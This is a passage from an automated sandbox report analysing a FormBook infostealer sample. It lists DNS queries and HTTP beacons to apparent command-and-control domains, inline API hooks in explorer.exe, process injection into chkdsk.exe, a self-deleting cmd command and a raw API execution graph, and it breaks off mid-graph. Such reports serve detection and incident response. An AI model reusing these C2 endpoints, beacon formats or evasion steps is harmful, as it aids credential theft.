                  May 14, 2022 13:08:49.640903950 CEST | 50152 | 53 | 192.168.2.3 | 8.8.8.8
                  May 14, 2022 13:08:49.670495033 CEST | 53 | 50152 | 8.8.8.8 | 192.168.2.3
                  May 14, 2022 13:09:09.940263033 CEST | 56639 | 53 | 192.168.2.3 | 8.8.8.8
                  May 14, 2022 13:09:10.118308067 CEST | 53 | 56639 | 8.8.8.8 | 192.168.2.3
                  May 14, 2022 13:09:30.653565884 CEST | 62724 | 53 | 192.168.2.3 | 8.8.8.8
                  May 14, 2022 13:09:30.674031019 CEST | 53 | 62724 | 8.8.8.8 | 192.168.2.3
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  May 14, 2022 13:08:49.640903950 CEST | 192.168.2.3 | 8.8.8.8 | 0x9c1c | Standard query (0) | www.informacion-numero-24-h.site | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:09.940263033 CEST | 192.168.2.3 | 8.8.8.8 | 0x8b0e | Standard query (0) | www.tzjisheng.com | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.653565884 CEST | 192.168.2.3 | 8.8.8.8 | 0x8d9d | Standard query (0) | www.rodosmail.xyz | A (IP address) | IN (0x0001)
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  May 14, 2022 13:08:49.670495033 CEST | 8.8.8.8 | 192.168.2.3 | 0x9c1c | No error (0) | www.informacion-numero-24-h.site | | 188.114.96.10 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:08:49.670495033 CEST | 8.8.8.8 | 192.168.2.3 | 0x9c1c | No error (0) | www.informacion-numero-24-h.site | | 188.114.97.10 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:10.118308067 CEST | 8.8.8.8 | 192.168.2.3 | 0x8b0e | No error (0) | www.tzjisheng.com | | 154.85.152.171 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | www.rodosmail.xyz | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
                  May 14, 2022 13:09:30.674031019 CEST | 8.8.8.8 | 192.168.2.3 | 0x8d9d | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
                  • www.informacion-numero-24-h.site
                  • www.tzjisheng.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.3 | 49808 | 188.114.96.10 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  May 14, 2022 13:08:49.696707010 CEST | 7579 | OUT | GET /sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS HTTP/1.1
                  Host: www.informacion-numero-24-h.site
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:08:49.724560976 CEST | 7580 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Sat, 14 May 2022 11:08:49 GMT
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: max-age=3600
                  Expires: Sat, 14 May 2022 12:08:49 GMT
                  Location: https://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q3jYpuw08wCTyYleUQgANz5%2FXm28vcSj4BwpLVOnE%2BnApx8wP1I2PlNxA8sjWRQIs%2Fbwiu%2BqJBI1neGaVXAUHTOBFP70cq8JwTnt1n%2F11%2Bw6rQ81FgayXw%2BWMDKdQyaFpmWylNMz5aZH9OSaPvxHi29l1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 70b32d9aab206937-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  1 | 192.168.2.3 | 49810 | 154.85.152.171 | 80 | C:\Windows\explorer.exe
                  Timestamp | kBytes transferred | Direction | Data
                  May 14, 2022 13:09:10.304163933 CEST | 8190 | OUT | GET /sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 HTTP/1.1
                  Host: www.tzjisheng.com
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  May 14, 2022 13:09:10.490811110 CEST | 8191 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Sat, 14 May 2022 11:09:10 GMT
                  Content-Type: text/html
                  Content-Length: 1780
                  Connection: close
                  Vary: Accept-Encoding


                  Code Manipulations

                  Function Name | Hook Type | Active in Processes
                  PeekMessageA | INLINE | explorer.exe
                  PeekMessageW | INLINE | explorer.exe
                  GetMessageW | INLINE | explorer.exe
                  GetMessageA | INLINE | explorer.exe
                  Function Name | Hook Type | New Data
                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE1


                  Target ID:0
                  Start time:13:07:14
                  Start date:14/05/2022
                  Path:C:\Users\user\Desktop\inlaww321345.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\inlaww321345.exe"
                  Imagebase:0x400000
                  File size:277700 bytes
                  MD5 hash:43E64E0AB6CA479C2AF3AFED56216A91
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Target ID:1
                  Start time:13:07:15
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 46%, ReversingLabs
                  Reputation:low

                  Target ID:2
                  Start time:13:07:16
                  Start date:14/05/2022
                  Path:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                  Imagebase:0x3b0000
                  File size:80384 bytes
                  MD5 hash:0A3F789C1F124B76E2EDC74EBEACF70A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:5
                  Start time:13:07:23
                  Start date:14/05/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6b8cf0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Target ID:16
                  Start time:13:07:49
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\chkdsk.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\chkdsk.exe
                  Imagebase:0x1040000
                  File size:23040 bytes
                  MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Target ID:17
                  Start time:13:07:54
                  Start date:14/05/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe"
                  Imagebase:0xc20000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:19
                  Start time:13:07:55
                  Start date:14/05/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c9170000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high

                    Execution Graph

                    Execution Coverage:16.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:16.3%
                    Total number of Nodes:1372
                    Total number of Limit Nodes:22
4044->4045 4046 40167b 4047 402da6 17 API calls 4046->4047 4048 401682 4047->4048 4049 402da6 17 API calls 4048->4049 4050 40168b 4049->4050 4051 402da6 17 API calls 4050->4051 4052 401694 MoveFileW 4051->4052 4053 4016a7 4052->4053 4059 4016a0 4052->4059 4054 4069a4 2 API calls 4053->4054 4055 4022f6 4053->4055 4057 4016b6 4054->4057 4056 401423 24 API calls 4056->4055 4057->4055 4058 40642e 36 API calls 4057->4058 4058->4059 4059->4056 4060 4019ff 4061 402da6 17 API calls 4060->4061 4062 401a06 4061->4062 4063 402da6 17 API calls 4062->4063 4064 401a0f 4063->4064 4065 401a16 lstrcmpiW 4064->4065 4066 401a28 lstrcmpW 4064->4066 4067 401a1c 4065->4067 4066->4067 4068 4022ff 4069 402da6 17 API calls 4068->4069 4070 402305 4069->4070 4071 402da6 17 API calls 4070->4071 4072 40230e 4071->4072 4073 402da6 17 API calls 4072->4073 4074 402317 4073->4074 4075 4069a4 2 API calls 4074->4075 4076 402320 4075->4076 4077 402331 lstrlenW lstrlenW 4076->4077 4078 402324 4076->4078 4080 4056d0 24 API calls 4077->4080 4079 4056d0 24 API calls 4078->4079 4082 40232c 4078->4082 4079->4082 4081 40236f SHFileOperationW 4080->4081 4081->4078 4081->4082 4083 401000 4084 401037 BeginPaint GetClientRect 4083->4084 4085 40100c DefWindowProcW 4083->4085 4086 4010f3 4084->4086 4090 401179 4085->4090 4088 401073 CreateBrushIndirect FillRect DeleteObject 4086->4088 4089 4010fc 4086->4089 4088->4086 4091 401102 CreateFontIndirectW 4089->4091 4092 401167 EndPaint 4089->4092 4091->4092 4093 401112 6 API calls 4091->4093 4092->4090 4093->4092 4094 404700 lstrcpynW lstrlenW 4095 401d81 4096 401d94 GetDlgItem 4095->4096 4097 401d87 4095->4097 4100 401d8e 4096->4100 4098 402d84 17 API calls 4097->4098 4098->4100 4099 401dd5 GetClientRect LoadImageW SendMessageW 4103 401e33 4099->4103 4105 401e3f 4099->4105 4100->4099 4101 402da6 17 API calls 4100->4101 4101->4099 4104 401e38 DeleteObject 4103->4104 4103->4105 4104->4105 4106 401503 4107 40150b 4106->4107 4109 40151e 4106->4109 4108 402d84 17 API 
calls 4107->4108 4108->4109 4110 402383 4111 40238a 4110->4111 4113 40239d 4110->4113 4112 4066ab 17 API calls 4111->4112 4114 402397 4112->4114 4115 405cce MessageBoxIndirectW 4114->4115 4115->4113 4116 402c05 SendMessageW 4117 402c1f InvalidateRect 4116->4117 4118 402c2a 4116->4118 4117->4118 4119 404789 4121 4048bb 4119->4121 4122 4047a1 4119->4122 4120 404925 4123 4049ef 4120->4123 4124 40492f GetDlgItem 4120->4124 4121->4120 4121->4123 4130 4048f6 GetDlgItem SendMessageW 4121->4130 4125 4045ca 18 API calls 4122->4125 4129 404631 8 API calls 4123->4129 4126 4049b0 4124->4126 4127 404949 4124->4127 4128 404808 4125->4128 4126->4123 4133 4049c2 4126->4133 4127->4126 4132 40496f SendMessageW LoadCursorW SetCursor 4127->4132 4131 4045ca 18 API calls 4128->4131 4143 4049ea 4129->4143 4152 4045ec EnableWindow 4130->4152 4136 404815 CheckDlgButton 4131->4136 4156 404a38 4132->4156 4138 4049d8 4133->4138 4139 4049c8 SendMessageW 4133->4139 4135 404920 4153 404a14 4135->4153 4150 4045ec EnableWindow 4136->4150 4138->4143 4144 4049de SendMessageW 4138->4144 4139->4138 4144->4143 4145 404833 GetDlgItem 4151 4045ff SendMessageW 4145->4151 4147 404849 SendMessageW 4148 404866 GetSysColor 4147->4148 4149 40486f SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4147->4149 4148->4149 4149->4143 4150->4145 4151->4147 4152->4135 4154 404a22 4153->4154 4155 404a27 SendMessageW 4153->4155 4154->4155 4155->4120 4159 405c94 ShellExecuteExW 4156->4159 4158 40499e LoadCursorW SetCursor 4158->4126 4159->4158 4160 40248a 4161 402da6 17 API calls 4160->4161 4162 40249c 4161->4162 4163 402da6 17 API calls 4162->4163 4164 4024a6 4163->4164 4177 402e36 4164->4177 4167 4024de 4168 4024ea 4167->4168 4172 402d84 17 API calls 4167->4172 4173 402509 RegSetValueExW 4168->4173 4174 403377 40 API calls 4168->4174 4169 40292e 4170 402da6 17 API calls 4171 4024d4 lstrlenW 4170->4171 4171->4167 4172->4168 4175 40251f RegCloseKey 4173->4175 4174->4173 4175->4169 4178 402e51 4177->4178 4181 
406509 4178->4181 4182 406518 4181->4182 4183 406523 RegCreateKeyExW 4182->4183 4184 4024b6 4182->4184 4183->4184 4184->4167 4184->4169 4184->4170 4185 40290b 4186 402da6 17 API calls 4185->4186 4187 402912 FindFirstFileW 4186->4187 4188 40293a 4187->4188 4192 402925 4187->4192 4193 4065b5 wsprintfW 4188->4193 4190 402943 4194 40666e lstrcpynW 4190->4194 4193->4190 4194->4192 4195 40190c 4196 401943 4195->4196 4197 402da6 17 API calls 4196->4197 4198 401948 4197->4198 4199 405d7a 67 API calls 4198->4199 4200 401951 4199->4200 4201 40190f 4202 402da6 17 API calls 4201->4202 4203 401916 4202->4203 4204 405cce MessageBoxIndirectW 4203->4204 4205 40191f 4204->4205 4206 40580f 4207 405830 GetDlgItem GetDlgItem GetDlgItem 4206->4207 4208 4059b9 4206->4208 4251 4045ff SendMessageW 4207->4251 4210 4059c2 GetDlgItem CreateThread CloseHandle 4208->4210 4211 4059ea 4208->4211 4210->4211 4213 405a01 ShowWindow ShowWindow 4211->4213 4214 405a3a 4211->4214 4215 405a15 4211->4215 4212 4058a0 4217 4058a7 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4212->4217 4253 4045ff SendMessageW 4213->4253 4221 404631 8 API calls 4214->4221 4216 405a75 4215->4216 4219 405a29 4215->4219 4220 405a4f ShowWindow 4215->4220 4216->4214 4226 405a83 SendMessageW 4216->4226 4224 405915 4217->4224 4225 4058f9 SendMessageW SendMessageW 4217->4225 4227 4045a3 SendMessageW 4219->4227 4222 405a61 4220->4222 4223 405a6f 4220->4223 4228 405a48 4221->4228 4229 4056d0 24 API calls 4222->4229 4230 4045a3 SendMessageW 4223->4230 4231 405928 4224->4231 4232 40591a SendMessageW 4224->4232 4225->4224 4226->4228 4233 405a9c CreatePopupMenu 4226->4233 4227->4214 4229->4223 4230->4216 4235 4045ca 18 API calls 4231->4235 4232->4231 4234 4066ab 17 API calls 4233->4234 4236 405aac AppendMenuW 4234->4236 4237 405938 4235->4237 4238 405ac9 GetWindowRect 4236->4238 4239 405adc TrackPopupMenu 4236->4239 4240 405941 ShowWindow 4237->4240 4241 405975 GetDlgItem SendMessageW 4237->4241 4238->4239 4239->4228 4243 
405af7 4239->4243 4244 405964 4240->4244 4245 405957 ShowWindow 4240->4245 4241->4228 4242 40599c SendMessageW SendMessageW 4241->4242 4242->4228 4246 405b13 SendMessageW 4243->4246 4252 4045ff SendMessageW 4244->4252 4245->4244 4246->4246 4248 405b30 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4246->4248 4249 405b55 SendMessageW 4248->4249 4249->4249 4250 405b7e GlobalUnlock SetClipboardData CloseClipboard 4249->4250 4250->4228 4251->4212 4252->4241 4253->4215 4254 404e11 4255 404e21 4254->4255 4256 404e3d 4254->4256 4265 405cb2 GetDlgItemTextW 4255->4265 4258 404e70 4256->4258 4259 404e43 SHGetPathFromIDListW 4256->4259 4261 404e5a SendMessageW 4259->4261 4262 404e53 4259->4262 4260 404e2e SendMessageW 4260->4256 4261->4258 4264 40140b 2 API calls 4262->4264 4264->4261 4265->4260 4266 401491 4267 4056d0 24 API calls 4266->4267 4268 401498 4267->4268 4269 402891 4270 402898 4269->4270 4271 402ba9 4269->4271 4272 402d84 17 API calls 4270->4272 4273 40289f 4272->4273 4274 4028ae SetFilePointer 4273->4274 4274->4271 4275 4028be 4274->4275 4277 4065b5 wsprintfW 4275->4277 4277->4271 4278 401f12 4279 402da6 17 API calls 4278->4279 4280 401f18 4279->4280 4281 402da6 17 API calls 4280->4281 4282 401f21 4281->4282 4283 402da6 17 API calls 4282->4283 4284 401f2a 4283->4284 4285 402da6 17 API calls 4284->4285 4286 401f33 4285->4286 4287 401423 24 API calls 4286->4287 4288 401f3a 4287->4288 4295 405c94 ShellExecuteExW 4288->4295 4290 401f82 4291 406ae6 5 API calls 4290->4291 4293 40292e 4290->4293 4292 401f9f CloseHandle 4291->4292 4292->4293 4295->4290 4296 402f93 4297 402fa5 SetTimer 4296->4297 4298 402fbe 4296->4298 4297->4298 4299 40300c 4298->4299 4300 403012 MulDiv 4298->4300 4301 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4300->4301 4301->4299 4303 401d17 4304 402d84 17 API calls 4303->4304 4305 401d1d IsWindow 4304->4305 4306 401a20 4305->4306 4307 401b9b 4308 401ba8 4307->4308 4309 401bec 4307->4309 4310 401c31 4308->4310 4317 401bbf 4308->4317 4311 
401bf1 4309->4311 4312 401c16 GlobalAlloc 4309->4312 4313 4066ab 17 API calls 4310->4313 4321 40239d 4310->4321 4311->4321 4328 40666e lstrcpynW 4311->4328 4314 4066ab 17 API calls 4312->4314 4315 402397 4313->4315 4314->4310 4320 405cce MessageBoxIndirectW 4315->4320 4326 40666e lstrcpynW 4317->4326 4318 401c03 GlobalFree 4318->4321 4320->4321 4322 401bce 4327 40666e lstrcpynW 4322->4327 4324 401bdd 4329 40666e lstrcpynW 4324->4329 4326->4322 4327->4324 4328->4318 4329->4321 4330 40261c 4331 402da6 17 API calls 4330->4331 4332 402623 4331->4332 4335 40615e GetFileAttributesW CreateFileW 4332->4335 4334 40262f 4335->4334 4336 40149e 4337 4014ac PostQuitMessage 4336->4337 4338 40239d 4336->4338 4337->4338 4339 40259e 4349 402de6 4339->4349 4342 402d84 17 API calls 4343 4025b1 4342->4343 4344 4025d9 RegEnumValueW 4343->4344 4345 4025cd RegEnumKeyW 4343->4345 4347 40292e 4343->4347 4346 4025ee RegCloseKey 4344->4346 4345->4346 4346->4347 4350 402da6 17 API calls 4349->4350 4351 402dfd 4350->4351 4352 4064db RegOpenKeyExW 4351->4352 4353 4025a8 4352->4353 4353->4342 4354 4015a3 4355 402da6 17 API calls 4354->4355 4356 4015aa SetFileAttributesW 4355->4356 4357 4015bc 4356->4357 3287 401fa4 3288 402da6 17 API calls 3287->3288 3289 401faa 3288->3289 3290 4056d0 24 API calls 3289->3290 3291 401fb4 3290->3291 3302 405c51 CreateProcessW 3291->3302 3294 401fdd CloseHandle 3298 40292e 3294->3298 3297 401fcf 3299 401fd4 3297->3299 3300 401fdf 3297->3300 3310 4065b5 wsprintfW 3299->3310 3300->3294 3303 401fba 3302->3303 3304 405c84 CloseHandle 3302->3304 3303->3294 3303->3298 3305 406ae6 WaitForSingleObject 3303->3305 3304->3303 3306 406b00 3305->3306 3307 406b12 GetExitCodeProcess 3306->3307 3311 406a77 3306->3311 3307->3297 3310->3294 3312 406a94 PeekMessageW 3311->3312 3313 406aa4 WaitForSingleObject 3312->3313 3314 406a8a DispatchMessageW 3312->3314 3313->3306 3314->3312 4358 40202a 4359 402da6 17 API calls 4358->4359 4360 402031 4359->4360 4361 406a3b 5 API calls 4360->4361 
4362 402040 4361->4362 4363 4020cc 4362->4363 4364 40205c GlobalAlloc 4362->4364 4364->4363 4365 402070 4364->4365 4366 406a3b 5 API calls 4365->4366 4367 402077 4366->4367 4368 406a3b 5 API calls 4367->4368 4369 402081 4368->4369 4369->4363 4373 4065b5 wsprintfW 4369->4373 4371 4020ba 4374 4065b5 wsprintfW 4371->4374 4373->4371 4374->4363 4375 40252a 4376 402de6 17 API calls 4375->4376 4377 402534 4376->4377 4378 402da6 17 API calls 4377->4378 4379 40253d 4378->4379 4380 402548 RegQueryValueExW 4379->4380 4383 40292e 4379->4383 4381 402568 4380->4381 4382 40256e RegCloseKey 4380->4382 4381->4382 4386 4065b5 wsprintfW 4381->4386 4382->4383 4386->4382 4387 4021aa 4388 402da6 17 API calls 4387->4388 4389 4021b1 4388->4389 4390 402da6 17 API calls 4389->4390 4391 4021bb 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4021c5 4392->4393 4394 402da6 17 API calls 4393->4394 4395 4021cf 4394->4395 4396 402da6 17 API calls 4395->4396 4397 4021d9 4396->4397 4398 402218 CoCreateInstance 4397->4398 4399 402da6 17 API calls 4397->4399 4402 402237 4398->4402 4399->4398 4400 401423 24 API calls 4401 4022f6 4400->4401 4402->4400 4402->4401 3699 403c2b 3700 403c46 3699->3700 3701 403c3c CloseHandle 3699->3701 3702 403c50 CloseHandle 3700->3702 3703 403c5a 3700->3703 3701->3700 3702->3703 3708 403c88 3703->3708 3706 405d7a 67 API calls 3707 403c6b 3706->3707 3709 403c96 3708->3709 3710 403c5f 3709->3710 3711 403c9b FreeLibrary GlobalFree 3709->3711 3710->3706 3711->3710 3711->3711 4403 401a30 4404 402da6 17 API calls 4403->4404 4405 401a39 ExpandEnvironmentStringsW 4404->4405 4406 401a4d 4405->4406 4408 401a60 4405->4408 4407 401a52 lstrcmpW 4406->4407 4406->4408 4407->4408 4414 4023b2 4415 4023c0 4414->4415 4416 4023ba 4414->4416 4418 4023ce 4415->4418 4419 402da6 17 API calls 4415->4419 4417 402da6 17 API calls 4416->4417 